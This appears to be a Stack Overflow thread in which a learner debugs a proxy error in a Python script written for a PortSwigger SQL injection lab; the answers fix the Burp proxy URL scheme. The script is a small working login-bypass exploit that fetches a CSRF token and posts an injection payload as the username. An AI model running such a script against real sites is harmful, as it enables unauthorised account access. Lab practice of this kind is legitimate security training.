# proxy max retries exceeded with url

Tags: python, python-3.x, proxy, urllib3

am following a tutorial on Youtube where we learn SQL injection on portswigger platform
and we write the exploit as script with python, am using kali linux as virtual machine, am suffering from proxy error and i didn't know what to search for other than stackoverflow with no benefit answers. now here is my python code first :

```
import requests
import sys
import urllib3
from bs4 import BeautifulSoup
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# the purpose of proxy is to proxy to myself in order to pass my request through burpsuit
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}

def get_csrf_token(s, url):
    r = s.get(url, verify=False, proxies=proxies)
    soup = BeautifulSoup(r.text, 'html.parser')
    csrf = soup.find("input")['value']
    return csrf


def exploit_sqli(s, url, payload):
    csrf = get_csrf_token(s, url)
    data = {"csrf": csrf,
        "username": payload,
        "password": "randomtext"}

    r = s.post(url, data=data, verify=False, proxies=proxies)
    res = r.text
    if "Log out" in res:
        return True
    else:
        return False

if __name__ == "__main__":
    try:
        url = sys.argv[1].strip()
        sqli_payload = sys.argv[2].strip()
    except IndexError:
        print('[-] Usage: %s <url> <sql-payload>' % sys.argv[0])
        print('[-] Example: %s www.example.com "1=1"' % sys.argv[0])

    s = requests.Session()

    if exploit_sqli(s, url, sqli_payload):
        print('[+] SQL injection successful! We have logged in as the administrator user.')
    else:
        print('[-] SQL injection unsuccessful.')
```

and am suffering of runtime error and here is my track trace:

> Traceback (most recent call last):   File
> "/home/kali/.local/lib/python3.10/site-packages/urllib3/connectionpool.py",
> line 700, in urlopen
> self._prepare_proxy(conn)   File "/home/kali/.local/lib/python3.10/site-packages/urllib3/connectionpool.py",
> line 996, in _prepare_proxy
> conn.connect()   File "/home/kali/.local/lib/python3.10/site-packages/urllib3/connection.py",
> line 364, in connect
> self.sock = conn = self._connect_tls_proxy(hostname, conn)   File "/home/kali/.local/lib/python3.10/site-packages/urllib3/connection.py",
> line 499, in *connect_tls_proxy
> socket = ssl_wrap_socket(   File "/home/kali/.local/lib/python3.10/site-packages/urllib3/util/ssl*.py",
> line 453, in ssl_wrap_socket
> ssl_sock = *ssl_wrap_socket_impl(sock, context, tls_in_tls)   File "/home/kali/.local/lib/python3.10/site-packages/urllib3/util/ssl*.py",
> line 495, in _ssl_wrap_socket_impl
> return ssl_context.wrap_socket(sock)   File "/usr/lib/python3.10/ssl.py", line 513, in wrap_socket
> return self.sslsocket_class._create(   File "/usr/lib/python3.10/ssl.py", line 1071, in _create
> self.do_handshake()   File "/usr/lib/python3.10/ssl.py", line 1342, in do_handshake
> self._sslobj.do_handshake() ssl.SSLError: [SSL: WRONG_VERSION_NUMBER] wrong version number (_ssl.c:997)
>
> During handling of the above exception, another exception occurred:
>
> Traceback (most recent call last):   File
> "/home/kali/.local/lib/python3.10/site-packages/requests/adapters.py",
> line 489, in send
> resp = conn.urlopen(   File "/home/kali/.local/lib/python3.10/site-packages/urllib3/connectionpool.py",
> line 787, in urlopen
> retries = retries.increment(   File "/home/kali/.local/lib/python3.10/site-packages/urllib3/util/retry.py",
> line 592, in increment
> raise MaxRetryError(_pool, url, error or ResponseError(cause)) urllib3.exceptions.MaxRetryError:
> HTTPSConnectionPool(host='0a0000f503d3bb1ac1b8273000b600cb.web-security-academy.net',
> port=443): Max retries exceeded with url: /login (Caused by
> ProxyError('Your proxy appears to only use HTTP and not HTTPS, try
> changing your proxy URL to be HTTP. See:
> [https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#https-proxy-error-http-proxy'](https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#https-proxy-error-http-proxy%27),
> SSLError(SSLError(1, '[SSL: WRONG_VERSION_NUMBER] wrong version number
> (_ssl.c:997)'))))
>
> During handling of the above exception, another exception occurred:
>
> Traceback (most recent call last):   File
> "/home/kali/Desktop/machines/portSwiggerLabs/sqlInjection/lab-02/sql-lab-02.py",
> line 43, in 
> if exploit_sqli(s, url, sqli_payload):   File "/home/kali/Desktop/machines/portSwiggerLabs/sqlInjection/lab-02/sql-lab-02.py",
> line 21, in exploit_sqli
> csrf = get_csrf_token(s, url)   File "/home/kali/Desktop/machines/portSwiggerLabs/sqlInjection/lab-02/sql-lab-02.py",
> line 12, in get_csrf_token
> r = s.get(url, verify=False, proxies=proxies)   File "/home/kali/.local/lib/python3.10/site-packages/requests/sessions.py",
> line 600, in get
> return self.request("GET", url, **kwargs)   File "/home/kali/.local/lib/python3.10/site-packages/requests/sessions.py",
> line 587, in request
> resp = self.send(prep, **send_kwargs)   File "/home/kali/.local/lib/python3.10/site-packages/requests/sessions.py",
> line 701, in send
> r = adapter.send(request, **kwargs)   File "/home/kali/.local/lib/python3.10/site-packages/requests/adapters.py",
> line 559, in send
> raise ProxyError(e, request=request) requests.exceptions.ProxyError:
> HTTPSConnectionPool(host='0a0000f503d3bb1ac1b8273000b600cb.web-security-academy.net',
> port=443): Max retries exceeded with url: /login (Caused by
> ProxyError('Your proxy appears to only use HTTP and not HTTPS, try
> changing your proxy URL to be HTTP. See:
> [https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#https-proxy-error-http-proxy'](https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#https-proxy-error-http-proxy%27),
> SSLError(SSLError(1, '[SSL: WRONG_VERSION_NUMBER] wrong version number
> (_ssl.c:997)'))))

i tried to check my localhost(127.0.0.1) ip if it's another one or maybe not configured or anything related and I didn't reach any result

Comment: did you check if you can access proxy server in other programs ? ie. you could test it with web browser.

Comment: @furas I asnwered my question if you're interested

Answer (score 2, accepted):

am answering my question after few searches after few days

first I debugged that my proxy didn't receive my requests from python
I searched and found this tutorial https://www.th3r3p0.com/random/python-requests-and-burp-suite.html to set linux environmental variables

and I edited my code to

`proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}`

since also burp it's default is http

Answer (score 0):

Not entirely sure, but by looking at the part of your stack trace:

```
Caused by ProxyError('Your proxy appears to only use HTTP and not HTTPS, try changing your proxy URL to be HTTP. See: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#https-proxy-error-http-proxy', SSLError(SSLError(1, '[SSL: WRONG_VERSION_NUMBER] wrong version number (_ssl.c:997)'))))
```

I would say to try only using an http url rather than an https as the argument you are passing to the script.

Comment: Unfortunately, same error :/

Comment: I asnwered my question if you're interested